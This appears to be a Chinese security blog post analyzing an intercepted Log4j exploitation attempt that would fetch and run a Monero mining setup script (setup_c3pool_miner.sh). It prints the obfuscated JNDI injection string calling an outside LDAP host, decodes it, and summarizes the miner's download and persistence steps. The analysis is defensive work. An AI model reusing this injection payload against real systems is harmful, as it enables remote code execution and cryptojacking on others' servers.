计算机系统应用教程网站

网站首页 > 技术文章 正文

又抓到一个门罗币挖矿启动脚本(setup_c3pool_miner.sh)

btikc 2024-09-09 01:39:59 技术文章 27 ℃ 0 评论

今天告警巡逻,又抓到一个门罗币挖矿启动脚本,利用log4j漏洞,在HTTP请求的多个字段中进行注入,经过分析,是漏洞探测,没有攻击成功。简单分析如下,HTTP请求中Cookie 字段被设置为 t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//cdn.x4b.lol:3306/TomcatBypass/Command/Base64/...}')。这段字符串中有一些占位符 ${},这是 Log4j 的表达式语法。在这里,它试图执行一些环境变量(env)的操作。攻击者利用这些环境变量来构造 JNDI 注入链,其中涉及到 ldap 协议,用于触发远程代码执行。${env:NaN:-j} 尝试检索环境变量NaN的值。NaN本身并不是一个有效的环境变量,因此它将返回备用值-j。翻译翻译就是:t('${jndi:ldap://cdn.x4b.lol:3306/TomcatBypass/Command/Base64/...}'

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

Base64后面的内容,就是下载门罗币挖矿启动脚本并执行,它的功能分为几个部分:

  1. 设置和打印欢迎信息: 在脚本一开始,它声明了版本号并打印了一些提示信息,告知如何报告问题以及脚本的使用方法。
  2. 命令行参数检查: 通过接收命令行参数,例如钱包地址和可选的邮箱地址,然后对它们进行检查。如果未提供钱包地址,脚本会输出错误信息并退出。
  3. 检查前提条件: 脚本会检查系统是否符合脚本运行的先决条件,如检查是否设置了 $HOME 环境变量、是否安装了 curllscpu 工具等。
  4. 计算参数和预期性能: 使用 lscpu 命令获取系统的 CPU 信息,并据此计算 Monero 加密货币挖矿的预期性能,包括线程数、CPU 频率、缓存大小等。
  5. 打印意图和说明: 输出一些文字,介绍脚本接下来的操作意图,告知将下载、设置和运行 Monero CPU 挖矿程序。也会显示挖矿预期性能和一些使用提示。
  6. 执行挖矿准备工作: 删除旧的挖矿程序、下载最新的挖矿程序、配置挖矿参数、创建挖矿相关的脚本等。
  7. 后台挖矿配置: 根据系统情况选择后台挖矿的方式,比如通过设置 systemd 服务或在用户的 .profile 文件中添加挖矿命令等。
  8. 挖矿使用提示: 提示用户如何在使用共享 VPS 的情况下合理使用 CPU 资源,并提供了一些限制 CPU 使用率的方法。

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

最近发表
标签列表